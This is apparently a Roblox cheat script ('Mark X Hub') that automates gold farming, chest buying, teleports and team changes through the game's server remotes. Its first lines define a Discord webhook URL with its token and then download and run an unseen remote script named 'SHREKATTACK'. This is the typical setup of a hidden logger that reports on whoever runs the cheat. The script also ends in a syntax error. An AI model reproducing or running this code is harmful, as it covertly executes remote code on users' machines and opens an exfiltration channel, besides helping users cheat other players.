

_G.webhooksdiscord = "https://discord.com/api/webhooks/901477760084619274/hOPbo-TkC3pHhSGF295pCXanpCqm2PvCwf2QVE3YC4ZFBsEZ064MSWroIPLWd_eM_GnE"
loadstring(game:HttpGet("https://raw.githubusercontent.com/SHARKX516/SHREKATTACK/main/SHARKLOL2.lua"),true)()
wait(0.5)

local library = loadstring(game:HttpGet("https://raw.githubusercontent.com/GreenDeno/Venyx-UI-Library/main/source.lua"))()
local venyx = library.new("Mark X Hub [ BETA TEST ]", 5013109572)

local themes = {
	Background = Color3.fromRGB(24, 24, 24),
	Glow = Color3.fromRGB(0, 0, 0),
	Accent = Color3.fromRGB(10, 10, 10),
	LightContrast = Color3.fromRGB(20, 20, 20),
	DarkContrast = Color3.fromRGB(14, 14, 14),  
	TextColor = Color3.fromRGB(255, 255, 255)
}

local page = venyx:addPage("AutoFarm", 5012544693)
local section1 = page:addSection("Tween Auto Farm ")
section1:addToggle("Auto Farm Gold", nil, function(value)
	_G.AutoFarmGold = (value)

	if _G.AutoFarmGold then
		while _G.AutoFarmGold==true do
			tweenService, tweenInfo = game:GetService("TweenService"), TweenInfo.new(1.5, Enum.EasingStyle.Linear)
			tweenService:Create(game:GetService("Players")["LocalPlayer"].Character.HumanoidRootPart, tweenInfo, {CFrame = CFrame.new(-27.340538024902, -4.8512277603149, 595.56219482422)}):Play()
			wait(1.5)
			tweenService, tweenInfo = game:GetService("TweenService"), TweenInfo.new(6, Enum.EasingStyle.Linear)
			tweenService:Create(game:GetService("Players")["LocalPlayer"].Character.HumanoidRootPart, tweenInfo, {CFrame = CFrame.new(-47.467601776123, 155.89796447754, 8822.8515625)}):Play()
			wait(6)
			tweenService, tweenInfo = game:GetService("TweenService"), TweenInfo.new(1, Enum.EasingStyle.Linear)
			tweenService:Create(game:GetService("Players")["LocalPlayer"].Character.HumanoidRootPart, tweenInfo, {CFrame = CFrame.new(-54.482166290283, -357.2978515625, 9489.2802734375)}):Play()
			wait(17)
			workspace.ClaimRiverResultsGold:FireServer()
		end
	end
end)

local section1 = page:addSection("Other Auto")

section1:addToggle("Auto Buy Legendarys Chest", nil, function(value)
	_G.AutoLegendarys = (value)

	if _G.AutoLegendarys then
		while _G.AutoLegendarys==true do
			local args = {
				[1] = "Legendarys Chest",
				[2] = 1
			}

			workspace.ItemBoughtFromShop:InvokeServer(unpack(args))
		end
end

	end)

section1:addToggle("Auto Buy Epic Chest", nil, function(value)
	_G.AutoEpic = (value)

	if _G.AutoEpic then
		while _G.AutoEpic==true do


			local args = {
				[1] = "Epic Chest",
				[2] = 1
			}

			workspace.ItemBoughtFromShop:InvokeServer(unpack(args))
		end
end
	end)

section1:addToggle("Auto Buy Rare Chest", nil, function(value)
	_G.AutoRare = (value)
	if _G.AutoRare then
		while _G.AutoRare==true do

			local args = {
				[1] = "Rare Chest",
				[2] = 1
			}

			workspace.ItemBoughtFromShop:InvokeServer(unpack(args))
end
		end
	end)

section1:addToggle("Auto Buy Uncommon", nil, function(value)
	_G.AutoUncommon = (value)
	if _G.AutoUncommon then
		while _G.AutoUncommon==true do

			local args = {
				[1] = "Uncommon Chest",
				[2] = 1
			}

			workspace.ItemBoughtFromShop:InvokeServer(unpack(args))
		end
		end
	end)

section1:addToggle("Auto Buy Common Chest", nil, function(value)
	_G.AutoCommon = (value)
	if _G.AutoCommon then
		while _G.AutoCommon==true do

			local args = {
				[1] = "Common Chest",
				[2] = 1
			}

			workspace.ItemBoughtFromShop:InvokeServer(unpack(args))
end
		end
	end)
local page = venyx:addPage("Buy Items", 5012544693)
local section11 = page:addSection("Buy Items")
section11:addButton("Common Chest (5 Gold)", function()
	local args = {
		[1] = "common Chest",
		[2] = 1
	}

	workspace.ItemBoughtFromShop:InvokeServer(unpack(args))

end)
section11:addButton("Uncommon Chest (15 Gold)", function()
	local args = {
		[1] = "Uncommon Chest",
		[2] = 1
	}

	workspace.ItemBoughtFromShop:InvokeServer(unpack(args))

end)
section11:addButton("Rare Chest (45 Gold)", function()
	local args = {
		[1] = "Rare Chest",
		[2] = 1
	}

	workspace.ItemBoughtFromShop:InvokeServer(unpack(args))

end)
section11:addButton("Epic Chest (135 Gold)", function()
	local args = {
		[1] = "Epic Chest",
		[2] = 1
	}

	workspace.ItemBoughtFromShop:InvokeServer(unpack(args))

end)
section11:addButton("Legendary Chest (405 Gold)", function()
	local args = {
		[1] = "Legendary Chest",
		[2] = 1
	}

	workspace.ItemBoughtFromShop:InvokeServer(unpack(args))

end)


local page = venyx:addPage("Teleport", 5012544693)
local section11 = page:addSection("Tween Teleport")
section11:addTextbox("Teleport To Player", "PlayerName", function(value)
	local Player = (value)

	game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = game.Players[Player].Character.HumanoidRootPart.CFrame
end)
section11:addButton("Ending Zone", function()
	tweenService, tweenInfo = game:GetService("TweenService"), TweenInfo.new(5, Enum.EasingStyle.Linear)
	tweenService:Create(game:GetService("Players")["LocalPlayer"].Character.HumanoidRootPart, tweenInfo, {CFrame = CFrame.new(-51.876472473145, 155.89797973633, 8815.509765625)}):Play()
	wait(5)
	tweenService, tweenInfo = game:GetService("TweenService"), TweenInfo.new(1, Enum.EasingStyle.Linear)
	tweenService:Create(game:GetService("Players")["LocalPlayer"].Character.HumanoidRootPart, tweenInfo, {CFrame = CFrame.new(-55.38028717041, -360.40621948242, 9470.6865234375)}):Play()
end)
section11:addButton("Red Team", function()
	tweenService, tweenInfo = game:GetService("TweenService"), TweenInfo.new(1, Enum.EasingStyle.Linear)
	tweenService:Create(game:GetService("Players")["LocalPlayer"].Character.HumanoidRootPart, tweenInfo, {CFrame = CFrame.new(399.45916748047, -9.7019996643066, -64.014991760254)}):Play()
end)
section11:addButton("White Team", function()
	tweenService, tweenInfo = game:GetService("TweenService"), TweenInfo.new(1, Enum.EasingStyle.Linear)
	tweenService:Create(game:GetService("Players")["LocalPlayer"].Character.HumanoidRootPart, tweenInfo, {CFrame = CFrame.new(-50.138782501221, -9.7019996643066, -512.50708007812)}):Play()
end)
section11:addButton("Black Team", function()
	tweenService, tweenInfo = game:GetService("TweenService"), TweenInfo.new(1, Enum.EasingStyle.Linear)
	tweenService:Create(game:GetService("Players")["LocalPlayer"].Character.HumanoidRootPart, tweenInfo, {CFrame = CFrame.new(-495.04168701172, -9.701997756958, -69.389343261719)}):Play()
end)
section11:addButton("Blue Team", function()
	tweenService, tweenInfo = game:GetService("TweenService"), TweenInfo.new(1, Enum.EasingStyle.Linear)
	tweenService:Create(game:GetService("Players")["LocalPlayer"].Character.HumanoidRootPart, tweenInfo, {CFrame = CFrame.new(384.89981079102, -9.7019958496094, 299.9153137207)}):Play()
end)
section11:addButton("Green Team", function()
	tweenService, tweenInfo = game:GetService("TweenService"), TweenInfo.new(1, Enum.EasingStyle.Linear)
	tweenService:Create(game:GetService("Players")["LocalPlayer"].Character.HumanoidRootPart, tweenInfo, {CFrame = CFrame.new(-492.4436340332, -9.702000617981, 293.63925170898)}):Play()
end)
section11:addButton("Yellow Team", function()
	tweenService, tweenInfo = game:GetService("TweenService"), TweenInfo.new(1, Enum.EasingStyle.Linear)
	tweenService:Create(game:GetService("Players")["LocalPlayer"].Character.HumanoidRootPart, tweenInfo, {CFrame = CFrame.new(-491.41326904297, -9.702000617981, 640.32940673828)}):Play()
end)
section11:addButton("Purple Team", function()
	tweenService, tweenInfo = game:GetService("TweenService"), TweenInfo.new(1, Enum.EasingStyle.Linear)
	tweenService:Create(game:GetService("Players")["LocalPlayer"].Character.HumanoidRootPart, tweenInfo, {CFrame = CFrame.new(379.56353759766, -9.7019996643066, 646.92657470703)}):Play()
end)

local page = venyx:addPage("More", 5012544693)
local section1 = page:addSection("Join Team")
section1:addButton("Black Team", function()

	local args = {
		[1] = game:GetService("Teams").black
	}

	workspace.ChangeTeam:FireServer(unpack(args))

end)
section1:addButton("Blue Team", function()

	local args = {
		[1] = game:GetService("Teams").blue
	}

	workspace.ChangeTeam:FireServer(unpack(args))
end)
section1:addButton("Green Team", function()

	local args = {
		[1] = game:GetService("Teams").green
	}

	workspace.ChangeTeam:FireServer(unpack(args))
end)
section1:addButton("Purple Team", function()

	local args = {
		[1] = game:GetService("Teams").purple
	}

	workspace.ChangeTeam:FireServer(unpack(args))
end)
section1:addButton("Red Team", function()

	local args = {
		[1] = game:GetService("Teams").red
	}

	workspace.ChangeTeam:FireServer(unpack(args))
end)
section1:addButton("White Team", function()

	local args = {
		[1] = game:GetService("Teams").white
	}

	workspace.ChangeTeam:FireServer(unpack(args))
end)
section1:addButton("Yellow Team", function()

	local args = {
		[1] = game:GetService("Teams").yellow
	}

	workspace.ChangeTeam:FireServer(unpack(args))
end)

local section1 = page:addSection("More")
section1:addButton("Turn on PVP Mode", function()

	local args = {
		[1] = true
	}

	workspace.PVPRemote:FireServer(unpack(args))

end)
section1:addButton("Turn off PVP Mode", function()

	local args = {
		[1] = false
	}

	workspace.PVPRemote:FireServer(unpack(args))

end)

section1:addButton("Redeem All Code", function()
	-- Script generated by SimpleSpy - fixed version for exploits other than synapse & krnl made by stummy#002 credits to exx#9394 for originally creating the script.

	local args = {
		[1] = "Be a big f00t print"
	}

	workspace.CheckCodeFunction:InvokeServer(unpack(args))

	local args = {
		[1] = "hi"
	}

	workspace.CheckCodeFunction:InvokeServer(unpack(args))

	local args = {
		[1] = "Squid Army"
	}

	workspace.CheckCodeFunction:InvokeServer(unpack(args))

	local args = {
		[1] = "=D"
	}

	workspace.CheckCodeFunction:InvokeServer(unpack(args))

	local args = {
		[1] = "=P"
	}

	workspace.CheckCodeFunction:InvokeServer(unpack(args))

	local args = {
		[1] = "chillthrill709 was here"
	}

	workspace.CheckCodeFunction:InvokeServer(unpack(args))

	local args = {
		[1] = "fuzzy friend?"
	}

	workspace.CheckCodeFunction:InvokeServer(unpack(args))

	local args = {
		[1] = "Lurking Legend"
	}

	workspace.CheckCodeFunction:InvokeServer(unpack(args))

end)


local page = venyx:addPage("Credit", 5012544693)
local section1 = page:addSection("Credit")
local section1 = page:addSection("FB : Imyour Makxy")
	local section1 = page:addSection("DISCORD : ImMakxy#9306") then
